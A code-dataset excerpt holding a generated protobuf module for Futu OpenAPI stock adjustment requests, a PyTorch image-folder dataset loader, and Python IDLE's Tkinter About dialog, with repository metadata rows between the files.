extension_ranges=[],
oneofs=[
],
serialized_start=68,
serialized_end=117,
)
_SECURITYREHAB = _descriptor.Descriptor(
name='SecurityRehab',
full_name='Qot_GetRehab.SecurityRehab',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='security', full_name='Qot_GetRehab.SecurityRehab.security', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='rehabList', full_name='Qot_GetRehab.SecurityRehab.rehabList', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=212,
)
_S2C = _descriptor.Descriptor(
name='S2C',
full_name='Qot_GetRehab.S2C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='securityRehabList', full_name='Qot_GetRehab.S2C.securityRehabList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=214,
serialized_end=275,
)
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='Qot_GetRehab.Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='c2s', full_name='Qot_GetRehab.Request.c2s', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=277,
serialized_end=318,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='Qot_GetRehab.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='retType', full_name='Qot_GetRehab.Response.retType', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=True, default_value=-400,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retMsg', full_name='Qot_GetRehab.Response.retMsg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='errCode', full_name='Qot_GetRehab.Response.errCode', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='s2c', full_name='Qot_GetRehab.Response.s2c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=320,
serialized_end=418,
)
_C2S.fields_by_name['securityList'].message_type = Qot__Common__pb2._SECURITY
_SECURITYREHAB.fields_by_name['security'].message_type = Qot__Common__pb2._SECURITY
_SECURITYREHAB.fields_by_name['rehabList'].message_type = Qot__Common__pb2._REHAB
_S2C.fields_by_name['securityRehabList'].message_type = _SECURITYREHAB
_REQUEST.fields_by_name['c2s'].message_type = _C2S
_RESPONSE.fields_by_name['s2c'].message_type = _S2C
DESCRIPTOR.message_types_by_name['C2S'] = _C2S
DESCRIPTOR.message_types_by_name['SecurityRehab'] = _SECURITYREHAB
DESCRIPTOR.message_types_by_name['S2C'] = _S2C
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
C2S = _reflection.GeneratedProtocolMessageType('C2S', (_message.Message,), dict(
DESCRIPTOR = _C2S,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.C2S)
))
_sym_db.RegisterMessage(C2S)
SecurityRehab = _reflection.GeneratedProtocolMessageType('SecurityRehab', (_message.Message,), dict(
DESCRIPTOR = _SECURITYREHAB,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.SecurityRehab)
))
_sym_db.RegisterMessage(SecurityRehab)
S2C = _reflection.GeneratedProtocolMessageType('S2C', (_message.Message,), dict(
DESCRIPTOR = _S2C,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.S2C)
))
_sym_db.RegisterMessage(S2C)
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.Request)
))
_sym_db.RegisterMessage(Request)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.Response)
))
_sym_db.RegisterMessage(Response)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023com.futu.openapi.pb'))
# @@protoc_insertion_point(module_scope)
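# Hedged round-trip sketch with the generated classes above. The values are
# illustrative; retType 0 is treated here as "success". Requires a protobuf
# runtime compatible with this generated stub.
resp = Response()
resp.retType = 0
resp.retMsg = 'OK'
data = resp.SerializeToString()

parsed = Response()
parsed.ParseFromString(data)
print(parsed.retType, parsed.retMsg)  # 0 OK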
| 33.067925
| 760
| 0.744266
|
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
_sym_db = _symbol_database.Default()
import Common_pb2 as Common__pb2
import Qot_Common_pb2 as Qot__Common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='Qot_GetRehab.proto',
package='Qot_GetRehab',
syntax='proto2',
serialized_pb=_b('\n\x12Qot_GetRehab.proto\x12\x0cQot_GetRehab\x1a\x0c\x43ommon.proto\x1a\x10Qot_Common.proto\"1\n\x03\x43\x32S\x12*\n\x0csecurityList\x18\x01 \x03(\x0b\x32\x14.Qot_Common.Security\"]\n\rSecurityRehab\x12&\n\x08security\x18\x01 \x02(\x0b\x32\x14.Qot_Common.Security\x12$\n\trehabList\x18\x02 \x03(\x0b\x32\x11.Qot_Common.Rehab\"=\n\x03S2C\x12\x36\n\x11securityRehabList\x18\x01 \x03(\x0b\x32\x1b.Qot_GetRehab.SecurityRehab\")\n\x07Request\x12\x1e\n\x03\x63\x32s\x18\x01 \x02(\x0b\x32\x11.Qot_GetRehab.C2S\"b\n\x08Response\x12\x15\n\x07retType\x18\x01 \x02(\x05:\x04-400\x12\x0e\n\x06retMsg\x18\x02 \x01(\t\x12\x0f\n\x07\x65rrCode\x18\x03 \x01(\x05\x12\x1e\n\x03s2c\x18\x04 \x01(\x0b\x32\x11.Qot_GetRehab.S2CB\x15\n\x13\x63om.futu.openapi.pb')
,
dependencies=[Common__pb2.DESCRIPTOR,Qot__Common__pb2.DESCRIPTOR,])
_C2S = _descriptor.Descriptor(
name='C2S',
full_name='Qot_GetRehab.C2S',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='securityList', full_name='Qot_GetRehab.C2S.securityList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=68,
serialized_end=117,
)
_SECURITYREHAB = _descriptor.Descriptor(
name='SecurityRehab',
full_name='Qot_GetRehab.SecurityRehab',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='security', full_name='Qot_GetRehab.SecurityRehab.security', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='rehabList', full_name='Qot_GetRehab.SecurityRehab.rehabList', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=212,
)
_S2C = _descriptor.Descriptor(
name='S2C',
full_name='Qot_GetRehab.S2C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='securityRehabList', full_name='Qot_GetRehab.S2C.securityRehabList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=214,
serialized_end=275,
)
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='Qot_GetRehab.Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='c2s', full_name='Qot_GetRehab.Request.c2s', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=277,
serialized_end=318,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='Qot_GetRehab.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='retType', full_name='Qot_GetRehab.Response.retType', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=True, default_value=-400,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retMsg', full_name='Qot_GetRehab.Response.retMsg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='errCode', full_name='Qot_GetRehab.Response.errCode', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='s2c', full_name='Qot_GetRehab.Response.s2c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=320,
serialized_end=418,
)
_C2S.fields_by_name['securityList'].message_type = Qot__Common__pb2._SECURITY
_SECURITYREHAB.fields_by_name['security'].message_type = Qot__Common__pb2._SECURITY
_SECURITYREHAB.fields_by_name['rehabList'].message_type = Qot__Common__pb2._REHAB
_S2C.fields_by_name['securityRehabList'].message_type = _SECURITYREHAB
_REQUEST.fields_by_name['c2s'].message_type = _C2S
_RESPONSE.fields_by_name['s2c'].message_type = _S2C
DESCRIPTOR.message_types_by_name['C2S'] = _C2S
DESCRIPTOR.message_types_by_name['SecurityRehab'] = _SECURITYREHAB
DESCRIPTOR.message_types_by_name['S2C'] = _S2C
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
C2S = _reflection.GeneratedProtocolMessageType('C2S', (_message.Message,), dict(
DESCRIPTOR = _C2S,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.C2S)
))
_sym_db.RegisterMessage(C2S)
SecurityRehab = _reflection.GeneratedProtocolMessageType('SecurityRehab', (_message.Message,), dict(
DESCRIPTOR = _SECURITYREHAB,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.SecurityRehab)
))
_sym_db.RegisterMessage(SecurityRehab)
S2C = _reflection.GeneratedProtocolMessageType('S2C', (_message.Message,), dict(
DESCRIPTOR = _S2C,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.S2C)
))
_sym_db.RegisterMessage(S2C)
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.Request)
))
_sym_db.RegisterMessage(Request)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.Response)
))
_sym_db.RegisterMessage(Response)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023com.futu.openapi.pb'))
# @@protoc_insertion_point(module_scope)
| true
| true
|
1c3eb8ac4bfe8c177995657ed6dd4e2736b430c7
| 1,896
|
py
|
Python
|
data/image_folder.py
|
matsumototo180/pytorch-CycleGAN-and-pix2pix-music
|
e9b39a51226c3ea67e3463df5218ff4beca8c7f7
|
[
"BSD-3-Clause"
] | null | null | null |
data/image_folder.py
|
matsumototo180/pytorch-CycleGAN-and-pix2pix-music
|
e9b39a51226c3ea67e3463df5218ff4beca8c7f7
|
[
"BSD-3-Clause"
] | null | null | null |
data/image_folder.py
|
matsumototo180/pytorch-CycleGAN-and-pix2pix-music
|
e9b39a51226c3ea67e3463df5218ff4beca8c7f7
|
[
"BSD-3-Clause"
] | null | null | null |
"""A modified image folder class
We modify the official PyTorch image folder (https://github.com/pytorch/vision/blob/master/torchvision/datasets/folder.py)
so that this class can load images from both current directory and its subdirectories.
"""
import torch.utils.data as data
from PIL import Image
import os
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
'.tif', '.TIF', '.tiff', '.TIFF',
'.npy'
]
def is_image_file(filename):
return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)
def make_dataset(dir, max_dataset_size=float("inf")):
images = []
assert os.path.isdir(dir), '%s is not a valid directory' % dir
for root, _, fnames in sorted(os.walk(dir)):
for fname in fnames:
if is_image_file(fname):
path = os.path.join(root, fname)
images.append(path)
return images[:min(max_dataset_size, len(images))]
def default_loader(path):
return Image.open(path).convert('RGB')
class ImageFolder(data.Dataset):
def __init__(self, root, transform=None, return_paths=False,
loader=default_loader):
imgs = make_dataset(root)
if len(imgs) == 0:
raise(RuntimeError("Found 0 images in: " + root + "\n"
"Supported image extensions are: " + ",".join(IMG_EXTENSIONS)))
self.root = root
self.imgs = imgs
self.transform = transform
self.return_paths = return_paths
self.loader = loader
def __getitem__(self, index):
path = self.imgs[index]
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
if self.return_paths:
return img, path
else:
return img
def __len__(self):
return len(self.imgs)
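# Hedged usage sketch for the flat-folder loader above. The directory path is
# a placeholder that should contain at least four images; the transform is the
# usual torchvision resize/crop/tensor pipeline.
import torchvision.transforms as transforms
from torch.utils.data import DataLoader

dataset = ImageFolder(root='./datasets/horses/trainA',
                      transform=transforms.Compose([
                          transforms.Resize(286),
                          transforms.RandomCrop(256),
                          transforms.ToTensor(),
                      ]),
                      return_paths=True)

loader = DataLoader(dataset, batch_size=4, shuffle=True)
images, paths = next(iter(loader))
print(images.shape)  # torch.Size([4, 3, 256, 256])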
| 28.298507
| 122
| 0.611287
|
import torch.utils.data as data
from PIL import Image
import os
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
'.tif', '.TIF', '.tiff', '.TIFF',
'.npy'
]
def is_image_file(filename):
return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)
def make_dataset(dir, max_dataset_size=float("inf")):
images = []
assert os.path.isdir(dir), '%s is not a valid directory' % dir
for root, _, fnames in sorted(os.walk(dir)):
for fname in fnames:
if is_image_file(fname):
path = os.path.join(root, fname)
images.append(path)
return images[:min(max_dataset_size, len(images))]
def default_loader(path):
return Image.open(path).convert('RGB')
class ImageFolder(data.Dataset):
def __init__(self, root, transform=None, return_paths=False,
loader=default_loader):
imgs = make_dataset(root)
if len(imgs) == 0:
raise(RuntimeError("Found 0 images in: " + root + "\n"
"Supported image extensions are: " + ",".join(IMG_EXTENSIONS)))
self.root = root
self.imgs = imgs
self.transform = transform
self.return_paths = return_paths
self.loader = loader
def __getitem__(self, index):
path = self.imgs[index]
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
if self.return_paths:
return img, path
else:
return img
def __len__(self):
return len(self.imgs)
| true
| true
|
1c3eba13da06e644c32c86598cdc0ded3557d779
| 6,680
|
py
|
Python
|
Lib/idlelib/aboutDialog.py
|
rbuzatu90/hyperv-python
|
82bf5a72b4d956ea05affe1644b47e378dec0f4e
|
[
"bzip2-1.0.6"
] | 69
|
2015-12-28T07:02:51.000Z
|
2022-03-31T13:36:42.000Z
|
Lib/idlelib/aboutDialog.py
|
rbuzatu90/hyperv-python
|
82bf5a72b4d956ea05affe1644b47e378dec0f4e
|
[
"bzip2-1.0.6"
] | 23
|
2016-03-04T10:43:24.000Z
|
2021-03-17T09:58:19.000Z
|
Lib/idlelib/aboutDialog.py
|
rbuzatu90/hyperv-python
|
82bf5a72b4d956ea05affe1644b47e378dec0f4e
|
[
"bzip2-1.0.6"
] | 24
|
2016-02-29T11:45:47.000Z
|
2021-12-24T08:41:37.000Z
|
"""About Dialog for IDLE
"""
from Tkinter import *
import os
from idlelib import textView
from idlelib import idlever
class AboutDialog(Toplevel):
"""Modal about dialog for idle
"""
def __init__(self, parent, title, _htest=False):
"""
_htest - bool, change box location when running htest
"""
Toplevel.__init__(self, parent)
self.configure(borderwidth=5)
# place dialog below parent if running htest
self.geometry("+%d+%d" % (
parent.winfo_rootx()+30,
parent.winfo_rooty()+(30 if not _htest else 100)))
self.bg = "#707070"
self.fg = "#ffffff"
self.CreateWidgets()
self.resizable(height=FALSE, width=FALSE)
self.title(title)
self.transient(parent)
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.Ok)
self.parent = parent
self.buttonOk.focus_set()
self.bind('<Return>',self.Ok) #dismiss dialog
self.bind('<Escape>',self.Ok) #dismiss dialog
self.wait_window()
def CreateWidgets(self):
frameMain = Frame(self, borderwidth=2, relief=SUNKEN)
frameButtons = Frame(self)
frameButtons.pack(side=BOTTOM, fill=X)
frameMain.pack(side=TOP, expand=TRUE, fill=BOTH)
self.buttonOk = Button(frameButtons, text='Close',
command=self.Ok)
self.buttonOk.pack(padx=5, pady=5)
#self.picture = Image('photo', data=self.pictureData)
frameBg = Frame(frameMain, bg=self.bg)
frameBg.pack(expand=TRUE, fill=BOTH)
labelTitle = Label(frameBg, text='IDLE', fg=self.fg, bg=self.bg,
font=('courier', 24, 'bold'))
labelTitle.grid(row=0, column=0, sticky=W, padx=10, pady=10)
#labelPicture = Label(frameBg, text='[picture]')
#image=self.picture, bg=self.bg)
#labelPicture.grid(row=1, column=1, sticky=W, rowspan=2,
# padx=0, pady=3)
byline = "Python's Integrated DeveLopment Environment" + 5*'\n'
labelDesc = Label(frameBg, text=byline, justify=LEFT,
fg=self.fg, bg=self.bg)
labelDesc.grid(row=2, column=0, sticky=W, columnspan=3, padx=10, pady=5)
labelEmail = Label(frameBg, text='email: idle-dev@python.org',
justify=LEFT, fg=self.fg, bg=self.bg)
labelEmail.grid(row=6, column=0, columnspan=2,
sticky=W, padx=10, pady=0)
labelWWW = Label(frameBg, text='https://docs.python.org/' +
sys.version[:3] + '/library/idle.html',
justify=LEFT, fg=self.fg, bg=self.bg)
labelWWW.grid(row=7, column=0, columnspan=2, sticky=W, padx=10, pady=0)
Frame(frameBg, borderwidth=1, relief=SUNKEN,
height=2, bg=self.bg).grid(row=8, column=0, sticky=EW,
columnspan=3, padx=5, pady=5)
labelPythonVer = Label(frameBg, text='Python version: ' + \
sys.version.split()[0], fg=self.fg, bg=self.bg)
labelPythonVer.grid(row=9, column=0, sticky=W, padx=10, pady=0)
tkVer = self.tk.call('info', 'patchlevel')
labelTkVer = Label(frameBg, text='Tk version: '+
tkVer, fg=self.fg, bg=self.bg)
labelTkVer.grid(row=9, column=1, sticky=W, padx=2, pady=0)
py_button_f = Frame(frameBg, bg=self.bg)
py_button_f.grid(row=10, column=0, columnspan=2, sticky=NSEW)
buttonLicense = Button(py_button_f, text='License', width=8,
highlightbackground=self.bg,
command=self.ShowLicense)
buttonLicense.pack(side=LEFT, padx=10, pady=10)
buttonCopyright = Button(py_button_f, text='Copyright', width=8,
highlightbackground=self.bg,
command=self.ShowCopyright)
buttonCopyright.pack(side=LEFT, padx=10, pady=10)
buttonCredits = Button(py_button_f, text='Credits', width=8,
highlightbackground=self.bg,
command=self.ShowPythonCredits)
buttonCredits.pack(side=LEFT, padx=10, pady=10)
Frame(frameBg, borderwidth=1, relief=SUNKEN,
height=2, bg=self.bg).grid(row=11, column=0, sticky=EW,
columnspan=3, padx=5, pady=5)
idle_v = Label(frameBg, text='IDLE version: ' + idlever.IDLE_VERSION,
fg=self.fg, bg=self.bg)
idle_v.grid(row=12, column=0, sticky=W, padx=10, pady=0)
idle_button_f = Frame(frameBg, bg=self.bg)
idle_button_f.grid(row=13, column=0, columnspan=3, sticky=NSEW)
idle_about_b = Button(idle_button_f, text='README', width=8,
highlightbackground=self.bg,
command=self.ShowIDLEAbout)
idle_about_b.pack(side=LEFT, padx=10, pady=10)
idle_news_b = Button(idle_button_f, text='NEWS', width=8,
highlightbackground=self.bg,
command=self.ShowIDLENEWS)
idle_news_b.pack(side=LEFT, padx=10, pady=10)
idle_credits_b = Button(idle_button_f, text='Credits', width=8,
highlightbackground=self.bg,
command=self.ShowIDLECredits)
idle_credits_b.pack(side=LEFT, padx=10, pady=10)
def ShowLicense(self):
self.display_printer_text('About - License', license)
def ShowCopyright(self):
self.display_printer_text('About - Copyright', copyright)
def ShowPythonCredits(self):
self.display_printer_text('About - Python Credits', credits)
def ShowIDLECredits(self):
self.display_file_text('About - Credits', 'CREDITS.txt', 'iso-8859-1')
def ShowIDLEAbout(self):
self.display_file_text('About - Readme', 'README.txt')
def ShowIDLENEWS(self):
self.display_file_text('About - NEWS', 'NEWS.txt')
def display_printer_text(self, title, printer):
printer._Printer__setup()
text = '\n'.join(printer._Printer__lines)
textView.view_text(self, title, text)
def display_file_text(self, title, filename, encoding=None):
fn = os.path.join(os.path.abspath(os.path.dirname(__file__)), filename)
textView.view_file(self, title, fn, encoding)
def Ok(self, event=None):
self.destroy()
if __name__ == '__main__':
from idlelib.idle_test.htest import run
run(AboutDialog)
| 45.442177
| 80
| 0.582186
|
from Tkinter import *
import os
from idlelib import textView
from idlelib import idlever
class AboutDialog(Toplevel):
def __init__(self, parent, title, _htest=False):
Toplevel.__init__(self, parent)
self.configure(borderwidth=5)
self.geometry("+%d+%d" % (
parent.winfo_rootx()+30,
parent.winfo_rooty()+(30 if not _htest else 100)))
self.bg = "#707070"
self.fg = "#ffffff"
self.CreateWidgets()
self.resizable(height=FALSE, width=FALSE)
self.title(title)
self.transient(parent)
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.Ok)
self.parent = parent
self.buttonOk.focus_set()
self.bind('<Return>',self.Ok)
self.bind('<Escape>',self.Ok)
self.wait_window()
def CreateWidgets(self):
frameMain = Frame(self, borderwidth=2, relief=SUNKEN)
frameButtons = Frame(self)
frameButtons.pack(side=BOTTOM, fill=X)
frameMain.pack(side=TOP, expand=TRUE, fill=BOTH)
self.buttonOk = Button(frameButtons, text='Close',
command=self.Ok)
self.buttonOk.pack(padx=5, pady=5)
frameBg = Frame(frameMain, bg=self.bg)
frameBg.pack(expand=TRUE, fill=BOTH)
labelTitle = Label(frameBg, text='IDLE', fg=self.fg, bg=self.bg,
font=('courier', 24, 'bold'))
labelTitle.grid(row=0, column=0, sticky=W, padx=10, pady=10)
byline = "Python's Integrated DeveLopment Environment" + 5*'\n'
labelDesc = Label(frameBg, text=byline, justify=LEFT,
fg=self.fg, bg=self.bg)
labelDesc.grid(row=2, column=0, sticky=W, columnspan=3, padx=10, pady=5)
labelEmail = Label(frameBg, text='email: idle-dev@python.org',
justify=LEFT, fg=self.fg, bg=self.bg)
labelEmail.grid(row=6, column=0, columnspan=2,
sticky=W, padx=10, pady=0)
labelWWW = Label(frameBg, text='https://docs.python.org/' +
sys.version[:3] + '/library/idle.html',
justify=LEFT, fg=self.fg, bg=self.bg)
labelWWW.grid(row=7, column=0, columnspan=2, sticky=W, padx=10, pady=0)
Frame(frameBg, borderwidth=1, relief=SUNKEN,
height=2, bg=self.bg).grid(row=8, column=0, sticky=EW,
columnspan=3, padx=5, pady=5)
labelPythonVer = Label(frameBg, text='Python version: ' + \
sys.version.split()[0], fg=self.fg, bg=self.bg)
labelPythonVer.grid(row=9, column=0, sticky=W, padx=10, pady=0)
tkVer = self.tk.call('info', 'patchlevel')
labelTkVer = Label(frameBg, text='Tk version: '+
tkVer, fg=self.fg, bg=self.bg)
labelTkVer.grid(row=9, column=1, sticky=W, padx=2, pady=0)
py_button_f = Frame(frameBg, bg=self.bg)
py_button_f.grid(row=10, column=0, columnspan=2, sticky=NSEW)
buttonLicense = Button(py_button_f, text='License', width=8,
highlightbackground=self.bg,
command=self.ShowLicense)
buttonLicense.pack(side=LEFT, padx=10, pady=10)
buttonCopyright = Button(py_button_f, text='Copyright', width=8,
highlightbackground=self.bg,
command=self.ShowCopyright)
buttonCopyright.pack(side=LEFT, padx=10, pady=10)
buttonCredits = Button(py_button_f, text='Credits', width=8,
highlightbackground=self.bg,
command=self.ShowPythonCredits)
buttonCredits.pack(side=LEFT, padx=10, pady=10)
Frame(frameBg, borderwidth=1, relief=SUNKEN,
height=2, bg=self.bg).grid(row=11, column=0, sticky=EW,
columnspan=3, padx=5, pady=5)
idle_v = Label(frameBg, text='IDLE version: ' + idlever.IDLE_VERSION,
fg=self.fg, bg=self.bg)
idle_v.grid(row=12, column=0, sticky=W, padx=10, pady=0)
idle_button_f = Frame(frameBg, bg=self.bg)
idle_button_f.grid(row=13, column=0, columnspan=3, sticky=NSEW)
idle_about_b = Button(idle_button_f, text='README', width=8,
highlightbackground=self.bg,
command=self.ShowIDLEAbout)
idle_about_b.pack(side=LEFT, padx=10, pady=10)
idle_news_b = Button(idle_button_f, text='NEWS', width=8,
highlightbackground=self.bg,
command=self.ShowIDLENEWS)
idle_news_b.pack(side=LEFT, padx=10, pady=10)
idle_credits_b = Button(idle_button_f, text='Credits', width=8,
highlightbackground=self.bg,
command=self.ShowIDLECredits)
idle_credits_b.pack(side=LEFT, padx=10, pady=10)
def ShowLicense(self):
self.display_printer_text('About - License', license)
def ShowCopyright(self):
self.display_printer_text('About - Copyright', copyright)
def ShowPythonCredits(self):
self.display_printer_text('About - Python Credits', credits)
def ShowIDLECredits(self):
self.display_file_text('About - Credits', 'CREDITS.txt', 'iso-8859-1')
def ShowIDLEAbout(self):
self.display_file_text('About - Readme', 'README.txt')
def ShowIDLENEWS(self):
self.display_file_text('About - NEWS', 'NEWS.txt')
def display_printer_text(self, title, printer):
printer._Printer__setup()
text = '\n'.join(printer._Printer__lines)
textView.view_text(self, title, text)
def display_file_text(self, title, filename, encoding=None):
fn = os.path.join(os.path.abspath(os.path.dirname(__file__)), filename)
textView.view_file(self, title, fn, encoding)
def Ok(self, event=None):
self.destroy()
if __name__ == '__main__':
from idlelib.idle_test.htest import run
run(AboutDialog)
| true
| true
|
1c3eba29dfde112cc3cbe366acda5cf030a01733
| 5,117
|
py
|
Python
|
memsource_cli/models/lqa_settings_dto.py
|
unofficial-memsource/memsource-cli-client
|
a6639506b74e95476da87f4375953448b76ea90c
|
[
"Apache-2.0"
] | 16
|
2019-09-25T00:20:38.000Z
|
2021-05-04T05:56:10.000Z
|
memsource_cli/models/lqa_settings_dto.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 26
|
